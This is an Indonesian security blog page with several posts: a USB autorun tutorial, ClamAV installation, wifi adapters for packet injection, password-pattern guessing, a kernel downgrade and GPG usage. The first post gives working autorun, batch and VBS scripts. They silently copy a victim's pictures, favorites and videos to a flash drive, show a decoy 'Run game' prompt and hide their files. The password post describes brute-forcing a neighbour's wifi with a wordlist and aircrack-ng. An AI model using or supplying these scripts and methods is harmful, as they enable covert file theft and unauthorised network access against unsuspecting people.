Tampilkan postingan dengan label security. Tampilkan semua postingan
Tampilkan postingan dengan label security. Tampilkan semua postingan

Membuat Script Otomatis Menyalin File Pada Komputer Ke Flashdisk Ketika Ditancapkan Pada Windows


TUTORIAL INI HANYA UNTUK KEPERLUAN INFORMASI DAN PEMBELAJARAN SAJA, JIKA ADA SESEORANG YANG MENYALAHGUNAKAN INFORMASI INI UNTUK KEPERLUAN TINDAK KEJAHATAN DAN MELAKUKAN COPY FILE ORANG LAIN TANPA IZIN KE PERANGKAT USB, SAYA SEBAGAI ADMIN TIDAK BERTANGGUNGJAWAB UNTUK HAL TERSEBUT JIKA TUTORIAL INI DIGUNAKAN TIDAK SEMESTINYA.

  Bagaimana cara membuat sebuah script pada usb drive sederhana yang berguna untuk meng-copy file seperti gambar, folder dan video ke dalam sebuah drive atau flashdisk secara otomatis dan diam-diam ketika dimasukkan, biasanya ini sering digunakan untuk keperluan membackup data penting secara otomatis tanpa perlu copy-paste lagi ke dalam flashdisk. Berikut ini adalah penjelasan beberapa alat dan bahan yang di butuhkan.

1. Perangkat USB




  Sekedar penjelasan gambar diatas, kita dapat menggunakan ukuran USB Drive atau FlashDisk dengan ukuran yang besar, tergantung data apa yang mau di tranfer ke dalam USB kita, Semakin banyak Ruang/Space yang ada pada USB itu lebih baik.

2. Buat Script Autorun.inf Pada USB



  Pada gambar diatas adalah dimana proses pembuatan file script autorun.inf. File ini berguna ketika kita memasukkan flashdisk atau USB pada komputer otomatis akan berjalan program batch sendirinya,  Juga bisa digunakan untuk mengubah icon flashdisk kita dengan sendirinya.
  Berikut adalah kode pengkodingan scipt, kita harus membuka editor sederhana seperti notepad pada gambar diatas atau tergantung selera kita masing masing.

[autorun]
icon=drive.ico
open=launch.bat
action=Click ok to Run game for Windows
shell\open\command=launch.bat
Lalu SAVE, script tersebut pada USB kita tadi dengan nama AutoRun.inf
Seperti Gambar di bawah ini :


Keteranga :
open   = membuka perintah kode ini mengambil file peluncuran batch dan membukanya.
action = Perintah Pesan Notifikasinya


  pada perintah Action ini dapat berubah sesuai dengan kebutuhan kita sendiri, ketika autorun menjalankan scriptnya kadang-kadang mungkin meminta pengguna atau user untuk membukanya tergantung apa yang kita masukkan pada pesan disini. Pesan Notikafi diatas adalah Akan memberitahu pengguna atau User untuk klik di sini untuk Pesan akan menjalankan program seperti membackup file dan lain lain. Kode ini bertindak sebagai cadangan hanya dalam kasus pengguna diminta apa untuk membuka.
Shell/command = bertindak sebagai file cadangan jika pengguna mengklik membatalkan bukannya terbuka ketika diminta. Kode ini akan mengeksekusi ketika icon drive diklik.


3. Buat Script Batch


Copy atau buat Script dibawah ini, lalu simpan Dalam FlashDisk Kita.
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
  Script Diatas Ini adalah ibaratnya sebuah jantung dari pengkopian pada flashdik, Seperti langkah terakhir pastikan kita menggunakan kata untuk membuat file ini simpan sebagai file.bat. Cara kerja Kode ini akan mencari folder User atau pengguna pada gambar, favorit, dan folder video kemudian akan melakukan copy filenya ini ke flash drive atau USB Drive yang ditemukan di folder foto, favorit, dan vids dan lalu akan membersihkan layar dan menutup segera jendela.
   Jika kita ingin menjalankan dan mengubah folder pengkopiannya cukup mengubah perintah scriptnya menjadi seperti di bawah ini dan sesuaikan folder mana yang akan di copy dalam flashdisk kita.
 %backupcmd% "%USERPROFILE%\music" "%drive%\all\music"

4. Script VB Untuk Menjalankan Proses Pada Backgroud



   Kode Script VB ini sangat sederhana yaitu untuk menjalankan file.bat sebagai suatu proses sehingga tidak menunjukkan prompt cmd pada layar atau membuat prosesnya berjalan secara backgroud. Berikut ini penulisan Script VB nya, lalu SAVE dalam drive Flashdisk kita dengan nama ekstansi .vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

5. Membuat Script batch Untuk Menjalankan Script VB & file.batch

  File batch ini melakukan dua hal, tampaknya untuk file invisible.vbs di root flash drive kemudian beban itu dengan file.bat sehingga file.bat dijalankan dengan kode dari file VBS. Buat Script dan simpan sebagai sebagai nama file launch.bat seperti di bawah ini

wscript.exe \invisible.vbs file.bat
Lalu Save Dalam Drive USB Flashdisk kita seperti gambar di bawah ini 



7. Testing

  Sekarang jika kita belum menempatkan semua file di root flash drive saatnya untuk melakukannya sekarang. Satu hal yang dapat kita lakukan adalah membuat semua file yang tersembunyi biar tidak semak atau bercampur aduk dengan fle kita nantinya.

ClamAV Malware Scanner Pada OS Linux Dan OS Lainnya

 
  Antivirus pada Os yang berbasis Linux ini tidak dibutuhkan tapi jika nanti file yang kita download dari Linux terus kita buka di Windows, bisa jadi file tersebut mengandung virus yang sangat membahayakan dan bisa merusak file pada OS Microsoft Windows kita.
  Di linux ada program Antivirus bernama ClamAV,  ClamAV adalah sebuah Aplikasi atau software Antivirus yang berlisensi open source yang cukup ampuh dalam mendeteksi malware (yang tentunya gratis).
  Aplikasi ini dikembangkan untuk Unix dan memiliki versi pihak ketiga yang tersedia untuk AIX , BSD , HP - UX , Linux , OS X , OpenVMS , OSF ( Tru64 ) dan Solaris.
  Software ClamAV secara Default
di OS Ubuntu, fedora, linux mint, debian dan lain lain pada repositori utamanya bisa langsung menginstalnya dengan Manajer Software Center atau Synaptic Package, Hanya dengan mencari dengan kata kunci ClamAV dan bisa langsung menginstalnya. oke langsung saja kita bahas bagaimana cara menginstall ClamAV pada Ubuntu, Fedora dan pada Distribusi lainnya.

UBUNTU
  Buka terminal (Ctrl+T), lalu masukan perintah di bawah ini untuk proses penginstalannya.
sudo apt-get install clamav clamav-daemon
Untuk UPDATE

sudo freshclam

FEDORA
  Buka terminal (Ctrl+T), lalu masukan perintah di bawah ini untuk proses penginstalannya.
sudo yum install -y clamav clamav-update
OTHER OS
   Untuk Penginstalan ClamAV pada OS lain atau distribusi Linux lainnya bisa langsung kunjungi di website resminya DISINI

Rekomendasi Wireless Adapter Card Terbaik Untuk Pentest

  Wireless adapter card adalah kartu jaringan yang berfungsi sebagai client untuk menerima dan mentrasmisikan sinyal. Wireless adapter card mempunyai prinsip kerja yang hampir sama dengan sebuah access ponit, tetapi sistemnya lebih sederhana. Apabila dalam sebuah access point terdapat memory maupun processor, maka pada wireless adapter penggunaanya tidak sedetail dan sebesar fitur dari access point. Perangkat ini adalah perangkat standard yang di gunakan untuk menhubungkan antar komputer atau mengkoneksikan jaringan.
  Dalam Dunia pentest bukan hanya sekedar software nya saja yang harus support seperti OS, kernel, script dan lain lain. Tetapi hardware nya juga, sebagai contoh dalam penginjeksian jaringan tidak semua wireless card yang mendukung metode ini, jadi dalam hal dunia pentest kita harus teliti dalam hal pemilihan dan penggunaan dari hardware, kernel hanya memerintahkan hardware, selebihnya hardware yang berkerja penuh. oke lanjut saja ini rekomendasi Wireless card terbaik untuk pentest yang saya kutip dari forum kali linux.


2.4GHz

Rokland N3


> Ralink RT3070 Detail
> 700 mW
> Detachable antenna (RP-SMA)
> IEEE 802.11b/g/n
> 150Mbps
> WEP, WPA/WPA2, WPS
> USB 2.0 
Untuk Selengkapnya bisa dicek disini Disini

Alfa AWUS036NHA 



> Realtek AR9002U Detail
> 800 mW (29dBm)
> Detachable antenna (RP-SMA)
> IEEE 802.11b/g/n
> 150Mbps
> WEP, WPA/WPA2, WPS
> USB 2.0
Untuk Selengkapnya bisa dicek Disini

TP-Link WN722N



> Atheros AR9002U Detail
> 500 mW
> Detachable antenna (RP-SMA)
> IEEE 802.11b/g/n
> 150Mbps
> WEP, WPA/WPA2, WPS
> USB 2.0
  Pada Dasarnya tp-link di atas itu adalah andalan saya, dalam hal menginjeksi jaringan, harganya pun murah berkisar antara 150 ribu sampai 200 ribu rupiah, jadi Untuk Situs Pembeliannya dengan harga terjangkau Bisa cek Disini 

5GHz (& 2.4GHz)
 

Rosewill RNX-N600UBE
 


> Ralink RT3572 Detail
> 100 mW ?
> Detachable antenna (SMA)
> IEEE 802.11a/b/g/n
> 300Mbps
> WEP, WPA/WPA2, WPS
> USB 2.0
Untuk selengkapnya bisa di cek di situs resminya Disini

Untuk bagaimana cara mengkofigurasinya pada Linux untuk menjalankan aircrack-ng bisa langsung Kesini

Pola Pembentukan Password Dan Ilmu Psikologi



  Biasanya ketika membuat pola sebuah password kita berusaha untuk membuat sebuah password yang mudah diingat dan tidak terfikirkan oleh orang lain. Bagi kebanyakan dari kita itu adalah kalimat atau nomor (atau kombinasi keduanya), sadar atau tidak sadar, kita biasanya membuat pola dengan makna mendalam dalam kehidupan kita.

  Pola password itu adalah hal yang sangat penting dalam pembentukan sebuah paswword biasanya simbol sebuah kalimat, atau simbol sebuah angka pada pola pikir masing masing, Sedangkan Password adalah Gabungan atau Kumpulan Pola Pola yang membentuk menjadi password. Jadi contohnya ketika saya berkunjung kesebuah warkop (warung kopi) untuk bersantai dan wifian gratis, otomatis saya harus meminta password wifinya.
  Ketika password sudah diberikan, saya menghafal pola tersebut yang mengindikasikan ini adalah "Password hari pertama"
contoh password wifi hari pertama :

kopisusu
  Kemudian ketika beberapa minggu saya berkunjung lagi dengan tujuan yang sama, ternyata ketika saya meminta password,  passwordnya sudah di ganti dan saya mengindikasikan bahwa ini "password hari kedua" yaitu :
milodingin
  Pada minggu selanjutnya saya berkunjung lagi kewarkop tersebut, dan lagi lagi password wifinya diganti dan saya mengindikasikan bahwa ini "password hari ketiga" yaitu :
sangerpanas
  Nah pada hari selanjutnya saya sudah bisa menetebak Pola passwordnya walaupun banyak kategori, setidaknya saya sudah bisa memahami pola password dari admin wifi workop tersebut (yang mengganti password wifi pada warkop) pola passwordnya yaitu "Tentang menu minuman yang ada di warkop tersebut"
  Dah jika kita pahami lagi cara penulisannya bahwa setiap penghubung kalimat tidak ada tanda spasi ini adalah pola penulisannya, jadi sudah bisa ditebak yaitu denga pola menu minuman pada warkop tersebut dan tidak ada spasi sebagai penghubung kalimat.
Contohnya seperti ini :


Hari pertama

kopi susu
hari kedua
milo dingin
hari ketika
sanger panas
  Sebagai contoh diatas antara penghubung kalimat terdapat tanda spasi, berarti pola password selanjutnya adalah menu minuman di warkop tersebut dan penghubung kalimat sbagai spasi. ini adalah sebagaian besar trik dari  psikologi bagaimana memahami pola pertama, kedua dan ketiga walaupun ini kemungkinanya yaitu 40% berhasil, setidaknya password selanjutnya tidak jauh berbeda.
  Pada ilustrasi di atas sudah jelas bahwa pola pembentukan password tidak jauh berbeda dengan password hari pertama,  pada contoh lain, terkadang pola password yang di pakai adalah tentang nama pacar, kesukaan, hobi maupun tanggal lahir dan lain lain.
     Untuk tujuan kenyamanan, sebelumnya kebanyakan orang suka menyimpan pola yang  sederhana,  Namun, ketika terjadi peretasan password, itu akan menjadi penting untuk memilih password yang kompleks yang sulit untuk ditebak.

  Sebagai pengalaman saya dalam hal menebak password, setidaknya kita harus pahami dulu si korban, tingkah laku, dan password password yang pernah diganti. dalam hal pengalaman saya ketika saya menebak password wifi tetangga saya, karena saya membutuhkan jaringan untuk ngeblog juga, jadi begini :
  Pada pola kasus pertama password wifinya adalah 294094080326, itu saya dapatkan karena meminta langsung kepada pemiliknya, pada bulan berikutnya password tersebut sudah di ganti yaitu 2940940803267777, itu juga saya minta langsunng karena rada rada gak enak juga sering sering numpang hehehe.
  jadi pada pergantian selanjutnya saya sudah menebak password tersebut yaitu 294094080326777785, bisa dilihat bahwasannya passwordnya cuma ditambahkan pada ujung password lama, jadi kita cuma membuat wordlist dari 2940940803267777 sampai 29409408032677779999 dengan bantuan aplikasi wordlist, lalu bermain dengan aricrack-ng (bruto force). itu logika nya yang saya sampaikan diatas adalah kemungkinan besar 40% berhasil jadi berhasil atau tidak itu tergantung pola pikir yang membuat password.

SEKIAN !!

Fix Wireless Injection Driver RTL8723be Pada Kali Linux 2.0



  Jaringan wireless atau yang dikenal dengan jaringan nirkabel memungkinkan mengkoneksi suatu perangkat (komputer, laptop,dll)kedalam jaringan, Dengan demikian banyak para attacker labil yang dikenal dengan BOCAH , mengambil keuntungan untuk, mengerjai orang , mencuri bandwith dan lain lain. Driver  RTL8723be adalah salah satu jenis dari perangkat atau chip NIC yang di produksi oleh vendor REALTEK, Biasanya pada Kali Linux pada kernel 4.X setelah kita menginstallkan driver RTL8723be tidak mendukung tools Aireplay-ng, MDK3 dan lain lain dalam proses menginjeksi jaringan, jadi kita harus melakukan patching pada kernel.

  Setelah saya googling kesana kemari Pada versi driver RTL8723be file patching untuk kernelnya tidak saya temukan, atau mungkin karena saya kurang bahasa inggris atau apalah, Sehingga saya mengambil sebuah inisiatif bahwa jika tidak ada file untuk patching Kernel, kita harus melakukan Downgrade Kernel 3.16 atau menurunkan versi kernel ke 3.16, biasanya pada kali linux 2.0 kernel default yang teristall adalah linux-image 4.x. Ok lanjut saja " Bagaimana mendowngrade sebuah kernel agar bisa menjalankan tools injeksi jaringan ?"


Cara Fix Nya 


Untuk 32-bit system 

Masukan peritah ini pada terminal 
cd Download
mkdir kernel
cd kernel
Download dengan perintah ini
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-headers-3.16.0-031600-generic_3.16.0-031600.201408031935_i386.deb

wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-headers-3.16.0-031600_3.16.0-031600.201408031935_all.deb


wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-image-3.16.0-031600-generic_3.16.0-031600.201408031935_i386.deb
Lalu install Kernel tersebut
sudo dpkg -i *.deb 
Selesai, lalu Restart dan pada GRUB pilih versi kernel  3.16
sudo reboot

Untuk 64-bit System

Masukan peritah ini pada terminal 
cd Download
mkdir kernel
cd kernel
Download dengan Perintah ini :
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-headers-3.16.0-031600-generic_3.16.0-031600.201408031935_amd64.deb

wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-headers-3.16.0-031600_3.16.0-031600.201408031935_all.deb


wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v3.16-utopic/linux-image-3.16.0-031600-generic_3.16.0-031600.201408031935_amd64.deb
 
 Lalu Install kernel tersebut 
sudo dpkg -i *.deb
Selesai, lalu Restart dan pada GRUB pilih versi kernel  3.16
sudo reboot
NB : 
  • Jika Pada penginstalan Kernel terdapat error itu artinya ada paket yang tidak lengkap, cara fixnya silahkan install paket tersebut !
  • jika ada Error pahami Error tersebut lalu cari solusi
  • Testing Pada Kali Linux 2.0 Sanaa 

Semoga Sukses !

Pemakaian Dan Penggunaan Enkripsi GPG Pada OS Linux



  GPG (GNU Privacy Guard) adalah suatu software enkripsi yang mengimplementasikan RFC2440. Penggunaan program ini biasanya ditemui pada enkripsi email atau sebagai digital signature. Model enkripsi yang digunakan adalah PKI(Public Key Infrastructure). Dengan demikian seseorang pasti mempunyai sepasang kunci yaitu Private Key dan Public Key. Tulisan ini membahas secara ringkas beberapa penggunaan umum GPG yang biasa dilakukan.
  Pada beberapa distro program ini terinstall secara default. Bila pada distro anda pgp belum terinstall, maka anda dapat mencari paket yang sesuai dengan distro yang anda pakai, atau mungkin menginstall manual dari source code yang bisa didownload Disini.

Oke lanjut saja pada tahap cara pemakaiannya dibawah ini :

Pembuatan Keypair

Sebelum menggunakan fasilitas yang ditawarkan oleh gpg, anda harus membuat keypair(pasangan private dan public key) terlebih dahulu.
[sokam@yudowati 17:54 sokam]$ gpg --gen-key
gpg (GnuPG) 1.2.4; Copyright (C) 2003 Free Software Foundation, Inc.
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it under certain conditions. See the file COPYING for details.

Please select what kind of key you want:
   (1) DSA and ElGamal (default)
   (2) DSA (sign only)
   (4) RSA (sign only)
Your selection? 
  Di sini anda dapat memilih algoritma yang digunakan untuk membuat keypair. Penggunaan DSA(2) atau RSA(4) terbatas pada digital signature dan tidak dapat digunakan untuk mengenkrip suatu teks. Pilih DSA and ElGamal dengan memasukkan angka "1" atau cukup dengan menekan tombol [Enter].
DSA keypair will have 1024 bits.
About to generate a new ELG-E keypair.
      minimum keysize is 768 bits
      default keysize is 1024 bits
      highest suggested keysize is 2048 bits
What keysize do you want? (1024)
 
  Pada bagian ini anda dapat memilih panjang kunci (dalam bit) yang digunakan sebagai kunci. Panjang key untuk DSA adalah 1024, dan yang anda pilih adalah panjang kunci ELG-E. Aturan umum yang berlaku adalah semakin pendek ukuran key yang anda pakai maka semakin mudah key itu dicrack oleh orang lain, namun dapat dikomputasi lebih cepat oleh komputer. Semakin panjang ukuran key, kamungkinan cracking semakin sulit, namun komputasinya juga memakan daya yang cukup besar. Untuk saat ini key dengan panjang 1024 bit dianggap sudah cukup kuat. Anda dapat memasukkan angka 768 atau 2048 untuk mengubah nilainya, namun bila anda memilih 1024 maka anda cukup menekan tombol [Enter].
Please specify how long the key should be valid.
       0 = key does not expire
    <n>  = key expires in n days
    <n>w = key expires in n weeks
    <n>m = key expires in n months
    <n>y = key expires in n years
Key is valid for? (0)
 
   Masukkan lama berlaku key anda. Lama waktu dapat mempunyai satuan hari, minggu, bulan, atau tahun. Bila anda memilih defaultnya (0) maka key anda akan berlaku seumur hidup atau sampai anda kehilangan private key anda. Berapa pun masa berlaku yang anda pilih, anda akan dimintai konfirmasi mengenai pilihan anda.
You need a User-ID to identify your key; the software constructs the user id
from Real Name, Comment and Email Address in this form:
    "Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"

    Real name: Kamas Muhammad
    Email address: kamas@entahlah.com
    Comment: sokam
    You selected this USER-ID:
        "Kamas Muhammad (sokam) <kamas@entahlah.com>"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit?
 
  Berikutnya anda harus memberi input minimal pada Real name dan Email address. Teks yang anda masukkan pada bagian Comment akan muncul di dalam tanda kurung. Masukkan huruf "O" dan tekan [Enter] bila anda sudah selesai.
You need a Passphrase to protect your secret key.

Enter passphrase:
 
  Masukkan passphrase anda. Passphrase ini dimasukkan dua kali. Ingat, jangan memasukkan passphrase yang mudah ditebak, tapi anda harus bisa mengingatnya.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
++++++++++.++++++++++++++++++++...+++++++++++++++++++++++++..++++++++++.+++++
.++++++++++++++++++++..++++++++++.++++ ++++++++++++++++++++++++++..+++++
............................................................................
..... .+++++
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++.++++++++++.+++++++++
++++++++++++++++.++++++++++++++++++++++ ++++.+++++++++++++++............
.......................................................................++++
+^^^
public and secret key created and signed.
key marked as ultimately trusted.

pub 1024D/7D2597DD 2004-12-13 Kamas Muhammad (sokam) <kamas@entahlah.com>
    Key fingerprint = DB9A F0A9 31E2 ED77 3AFF  3D26 ADD5 B92F 7D25 97DD
    sub 1024g/FE6B4921 2004-12-13 
   Karakter acak yang muncul seperti pada cuplikan di atas menunjukkan proses pembuatan keypair. Setelah proses ini selesai, maka hasilnya akan ditampilkan di bawah. Pada contoh di atas key yang baru dibuat mempunyai sidik jari DB9A F0A9 31E2 ED77 3AFF  3D26 ADD5 B92F 7D25 97DD, dengan UserID 7D2597DD.

Export Public key

   Seperti yang tadi sempat disebutkan bahwa public key harus didistribusikan(entah dengan cara apa) kepada orang lain. Untuk itu kita harus mengexport public kita. 
[sokam@yudowati 18:53 sokam]$ gpg --export -a kamas@entahlah.com
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.4 (GNU/Linux)

mQGiBEG9e+MRBACCNz0Ikx4jouFT1Z3dY8mGwiDVxJuATRr7SpHCA+endBjR9d1R
zd9MLD5eyvHtVIeeii8oFNCHw7WA6wREblvcRrNPqHjmkR2lIlKI4QEosQsaAN/8
fy5eLlWZvrZjjepVde6kSuiM4ClN2tuTgplXDjwBGattWcTh5OgL1qyUIwCg3kF9
+mvEE7V0aZNe96kz8FkOlc0D/RzEdtkJWqblZ7CHmR85seybul/EWFUYv+4r0xfx
wF5dtr2G1VOauZWM6y5TcrsvHHzdtQYZhbZ9tqPZ8J64+00GKdHR/7ZyBbB6iAo8
DOxON1x/euGHNcsp2q1VSvXsbQ6phb6bMZMj47AbDwzrrX/djX+F58ajRsf+yCIW
Wf+TA/wLpNwUUAwltNv+k1JfG8Xb3Xi6Uif97n9biFPE//cIZ8v3XshObiQg9KRR
BHtcZR++UN21gtAtmooO54Ymo6EMqfOw6dEuQL1lykcKPEcU8graBZMMA8/pVMMM
OuOsCzEGFdp12SpS5YbTBoRYYh5Gt6BK8MK28Z3M2LA5WHHh97YAAAArS2FtYXMg
TXVoYW1tYWQgKHNva2FtKSA8a2FtYXNAZW50YWhsYWguY29tPoheBBMRAgAeBQJB
vXvjAhsDBgsJCAcDAgMVAgMDFgIBAh4BAheAAAoJELmv46iRqkXy4QEAmQGGoOnW
7i0PqsP4QsXbEsCOoKr4AKCVyejE2rGcjMs73n44YMANAlWsFrkBDQRBvXvrEAQA
+l30skBL33SJjpq63WIVt9Td64TBlACbdHdg51t/hNL/1sO54Q4d6xFCUvhcZnA3
L6b9+KHz2Z15k19/DVV35Yo0jQiM5V9gim4PPnLO7UwNyANeD6da6lrjsCcKZx4F
rHjM5iKU/z5VT2cAgeiMhPMA0XkmsKPQaGdjFV69f1cAAwUD/iWWZUkpEkpfh+HE
v8rtP6kPJ64s2gBivtQGnRJysUfOQJ2tSXlyajveZmwYuHRVMmDMDo9YEajtakqL
j5Q+FYwvWWoM8CXNgN5WBjEiBFFCOvx2IhqbiZajqQ7pv9+UiyFyjmSODb4eEmSj
vvA+8VLq1L9YcBHLl/tdTEXBkRAFiEkEGBECAAkFAkG9e+sCGwwACgkQua/jqJGq
RfJy7QCgnzANWiq4N7ljv8wbPDLYONFV5LAAoNTexQryWjGYBW+UVhD7mBBmi+uD
=HMhm
-----END PGP PUBLIC KEY BLOCK-----
 
   Blok text di atas adalah public key kamas@entahlah.com. Pilihan (-a) digunakan untuk mengexport key dalam bentuk text. Tanpa pilihan itu maka key akan diexport dalam bentuk binary. Penasaran? Silakan coba ulangi perintah di atas tanpa opsi -a. Hasilnya takkan menyakiti siapa pun.
Teks itu dapat kita distribusikan melalui segala macam media seperti website, melalui email, atau disubmit key keyserver agar dapat diakses oleh orang lain dengan mudah.


Import Public Key 

  Sebelum anda dapat mengenkrip teks untuk orang lain atau memverifikasi tanda tangan orang lain anda harus mengimport public key orang itu. Pada contoh ini sokam mengimport public key milik wawa yang telah didownload dan disimpan pada file pkwawa.asc.
[sokam@yudowati 19:05 sokam]$ gpg --import < pkwawa.asc
gpg: key 6A31E44C: public key "Purwaning <wawa@sayang.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
  Sekarang, pada daftar key dapat kita lihat bahwa kita memiliki 2 key yakni milik kamas dan wawa.
[sokam@yudowati 19:08 sokam]$ gpg --list-key
/home/sokam/.gnupg/pubring.gpg
------------------------------
pub 1024D/7D2597DD 2004-12-13 Kamas Muhammad (sokam) <kamas@entahlah.com>
sub 1024g/FE6B4921 2004-12-13

pub 1024D/6A31E44C 2004-12-13 Purwaning <wawa@sayang.com>
sub 1024g/F0F8A1D0 2004-12-13 
 Mengenkripsikan Text

Misal kita mempunyai sebuah file dengan nama fileteks.txt. Isi file ini sebelum dienkrip bila dilihat dengan cat tampak seperti di bawah ini.
[sokam@yudowati 19:13 sokam]$ cat fileteks.txt
Tak kuasa ku menahan jenuh ini
Kian lama kian menyesak menyiksa
Dalam hampa

Sebaiknya kau biarkan ku memilih
Agar tiada kendala antara kita
Yang menjadi penyesalan

Kuingin memahami segala yang menjadi beban di benakmu
Hilangkanlah prasangka seolah kumengekang keinginan
Yang kau pendam
 Kini file teks di atas akan dienkrip untuk wawa@sayang.com 
[sokam@yudowati 19:16 sokam]$ gpg -e -r wawa@sayang.com -a fileteks.txt
Perintah di atas memiliki beberapa opsi yaitu:
  • -e/--encrypt: mengenkrip suatu file. 
  • -r/--recipient: tujuan pesan. Pilihan ini menentukan public key mana yang digunakan untuk mengenkrip pesan kita. Pada contoh di atas tujuannya adalah wawa@sayang.com. 
  • -a/--armor: output enkripsi dalam bentuk ascii/text, bukan binary.
  Hasilnya adalah sebuah file dengan nama fileteks.txt.asc yang isinya adalah sebagai berikut.
[sokam@yudowati 19:16 sokam]$ cat fileteks.txt.asc
-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.2.4 (GNU/Linux)

hQEOA9QUeAPw+KHQEAP5AbYFeQGqYOOEZe+NW+QOzAASegaTe5aX/l9tVr5+CnHR
YGlDDfSiH6+usTLqsxTDnnh7gczlLk89hYPIiFCVoXz56396wN7gGhGwNIdiiC4P
j+3WjuaarT7I/ykftPDLAv5B6SWZOclrj0xs9JT4UpSBs/zkHSuA1IHBWcwVrDID
/2xtGghcRj1uant3TWmeesHicvy6BaE8tq5xzyrM4y8DQHWc/Q6XGFolUcvhghwn
OYuaeM9KcchZ360tzQFuU0qDRkbnLpf9Y0ukvJG6yZ364pHTYIltvrdHxqnOZQTa
+NHIGitD7ec5bz7rbRj5lS557SsuIswUIN1wdjAbWCru0sBCAZ/OvlZDKCTAvN9s
rXW127sEZtL11/NvU9pX47qKaWbjSN6/B71zCScMOrncjt39nRacfHJZHjC/uMAR
soCt6UQj7tTvBu+RkopjBp4f4QyiNXbj5hICmfV4VtO81tzXWkBM3d+uvSkstqBg
RIrO3A2XC73OGp6CHwWfP6sBPkTtnljiX/x8BhhZZga1fJ563KToShBqPqsffy6h
PMf2ncqvU/sxA/ZmpWZ4VZdvBqVusfB322aG8Sft2n0eHpbr28PUG0PPJiz65O23
mYrLSDXJvXqSfiThfTies0Lm8NrP5/WE0qkT+ibQiBh0aqpK6Rk+hbE8xhf/9cAh
b0cCCYRQ
=uUMQ
-----END PGP MESSAGE----- 
  Dapat kita lihat bahwa hasilnya sudah tidak bisa lagi dibaca. Puisi romantis itu kini telah menjadi huruf acak yang hanya Wawa saja yang dapat membukanya.

Mendeskripsikan Text

  Teks yang dikirim oleh Sokam ke Wawa adalah teks yang telah dienkrip, sehingga bila di tengah jalan ada orang yang iseng mengintip, maka mungkin dia hanya bisa membaca mantra pengusir nyamuk yang takkan jelas suaranya bila dia tetap nekat membacanya.
  Wawa pun akan menerima teks yang persis sama, yaitu dalam bentuk yang terenkrip. Hanya saja, karena Wawa mempunyai private key dari public key yang digunakan oleh Sokam mengenkrip puisinya maka dia dapat membaca isi file itu. Berikut adalah keluaran dekrip teks yang dilakukan oleh Wawa.

[wawa@yudowati 19:30 wawa]$ gpg --decrypt fileteks.txt.asc

You need a passphrase to unlock the secret key for
user: "Purwaning <wawa@sayang.com>"
1024-bit ELG-E key, ID F0F8A1D0, created 2004-12-13 (main key ID 6A31E44C)

Enter passphrase: ******
user: "Purwaning <wawa@sayang.com>"
1024-bit ELG-E key, ID F0F8A1D0, created 2004-12-13 (main key ID 6A31E44C)

gpg: encrypted with 1024-bit ELG-E key, ID F0F8A1D0, created 2004-12-13
"Purwaning <wawa@sayang.com>"
Tak kuasa ku menahan jenuh ini
Kian lama kian menyesak menyiksa
Dalam hampa

Sebaiknya kau biarkan ku memilih
Agar tiada kendala antara kita
Yang menjadi penyesalan

Kuingin memahami segala yang menjadi beban di benakmu
Hilangkanlah prasangka seolah kumengekang keinginan
Yang kau pendam.
   Untuk mendekrip teks itu Wawa perlu memasukkan passphrase yang digunakan saat dia membuat keypair. Bila passphrase yang dimasukkan salah maka file itu tidak dapat didekrip. Bila yang passphrase yang dimasukkan benar maka seperti yang tampak pada potongan teks di atas, Wawa dapat membaca puisi yang dikirim oleh Kamas.

Mendatangani Suatu File 

  Selain dienkrip, suatu file juga dapat ditandatangani sehingga nantinya dapat diperiksa apakah file/teks yang diterima benar-benar dikirim oleh orang yang diharapkan atau tidak. Puisi sokam bila ditandatangani tanpa dienkrip akan tampak seperti di bawah ini.
[sokam@yudowati 19:55 sokam]$ gpg -u 7D2597DD --clearsign fileteks.txt

You need a passphrase to unlock the secret key for
user: "Kamas Muhammad (sokam) <kamas@entahlah.com>"
1024-bit DSA key, ID 7D2597DD, created 2004-12-13

Enter passphrase: *****


[sokam@yudowati 20:03 sokam]$
cat fileteks.txt.asc
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Tak kuasa ku menahan jenuh ini
Kian lama kian menyesak menyiksa
Dalam hampa

Sebaiknya kau biarkan ku memilih
Agar tiada kendala antara kita
Yang menjadi penyesalan

Kuingin memahami segala yang menjadi beban di benakmu
Hilangkanlah prasangka seolah kumengekang keinginan
Yang kau pendam

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBvZFBrdW5L30ll90RAqtsAJ94Mg5X4g8szoIlPhWenHld/Rh/AwCfYNyf
XvI3bQEJ4C5Itu2S4Kz5Ga0=
=Yi1E
-----END PGP SIGNATURE-----
  Parameter (-u) digunakan untuk menentukan username yang digunakan untuk menandatangani file yang kita sebutkan. Parameter ini tidak dibutuhkan bila default-key telah dikonfigurasi pada ~/.gnupg/options. Yang dipakai untuk menandatangani adalah private key, jadi kita tidak bisa menandatangani suatu teks dengan menggunakan public key orang lain. --clearsign adalah pilihan untuk menandatangani dalam bentuk clear text.

Verifikasi Tandatangan

